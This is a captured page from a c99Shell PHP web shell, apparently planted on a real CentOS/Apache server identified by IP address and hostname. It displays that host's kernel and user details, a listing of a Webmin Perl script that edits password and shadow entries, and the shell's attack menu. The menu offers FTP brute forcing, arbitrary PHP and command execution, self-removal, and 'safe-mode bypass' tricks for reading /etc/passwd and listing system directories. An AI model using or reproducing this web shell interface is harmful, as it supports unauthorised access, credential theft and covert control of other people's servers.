110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/nis/ drwxr-xr-x Free 50.94 GB of 127.8 GB (39.86%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


#!/usr/bin/perl
# save_passwd_shadow.cgi
# Create, update or delete a password/shadow files entry

require './nis-lib.pl';
use Time::Local;
&ReadParse();

($t, $lnums, $passwd, $shadow) =
    &table_edit_setup($in{'table'}, $in{'line'}, ':');
if ($in{'delete'}) {
    # Just delete the user
    &table_delete($t, $lnums);
    }
else {
    # Validate inputs and save the user
    &error_setup($text{'passwd_err'});
    $in{'name'} =~ /^[^: \t]+$/ || &error($text{'passwd_ename'});
    $in{'uid'} =~ /^\d+$/ || &error($text{'passwd_euid'});
    $in{'gid'} =~ /^\d+$/ || &error($text{'passwd_egid'});
    $in{'real'} =~ /^[^:]*$/ || &error($text{'passwd_ereal'});
    $in{'home'} =~ /^[^:]+$/ || &error($text{'passwd_ehome'});
    $in{'shell'} ne '' || $in{'other'} =~ /^[^:]+$/ ||
        &error($text{'passwd_eshell'});
    $in{'passmode'} != 2 || $in{'encpass'} =~ /^[^:]*$/ ||
        &error($text{'passwd_epass'});
    %uconfig = &foreign_config("useradmin");
    $salt = chr(int(rand(26))+65) . chr(int(rand(26))+65);
    @passwd = ( $in{'name'}, 'x',
            $in{'uid'}, $in{'gid'}, $in{'real'},
            $in{'home'}, $in{'shell'} ? $in{'shell'} : $in{'other'} );
    $pass = $in{'passmode'} == 0 ? "" :
        $in{'passmode'} == 1 ? $uconfig{'lock_string'} :
        $in{'passmode'} == 2 ? $in{'encpass'} :
                       &unix_crypt($in{'pass'}, $salt);
    if ($in{'mode'} == 2) {
        # Parse extra shadow inputs
        if ($in{'expired'} ne "" && $in{'expirem'} ne "" &&
            $in{'expirey'} ne "") {
            eval { $expire = timelocal(0, 0, 12, $in{'expired'},
                           $in{'expirem'}-1,
                           $in{'expirey'}-1900) };
            &error($text{'passwd_eexpire'}) if ($@);
            $expire = int($expire / (60*60*24));
            }
        $in{'min'} =~ /^[0-9]*$/ || &error($text{'passwd_emin'});
        $in{'max'} =~ /^[0-9]*$/ || &error($text{'passwd_emax'});
        $in{'warn'} =~ /^[0-9]*$/ || &error($text{'passwd_ewarn'});
        $in{'inactive'} =~ /^[0-9]*$/ || &error($text{'passwd_einactive'});
        @shadow = ( $in{'name'}, $pass,
                undef, $in{'min'}, $in{'max'}, $in{'warn'},
                $in{'inactive'}, $expire, $shadow->[8] );
        $shadow[2] = int(time() / (60*60*24))
            if ($shadow[1] ne $shadow->[1]);
        }
    elsif ($in{'mode'} == 1) {
        @shadow = ( $in{'name'}, $pass,
                @$shadow[2..8] );
        }
    else {
        $passwd[1] = $pass;
        }

    if ($in{'line'} eq '') {
        &table_add($t, ":", \@passwd, \@shadow);
        }
    else {
        &table_update($t, $lnums, ":", \@passwd, \@shadow);
        }
    }
&apply_table_changes() if (!$config{'manual_build'});
&redirect("edit_tables.cgi?table=$in{'table'}");

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: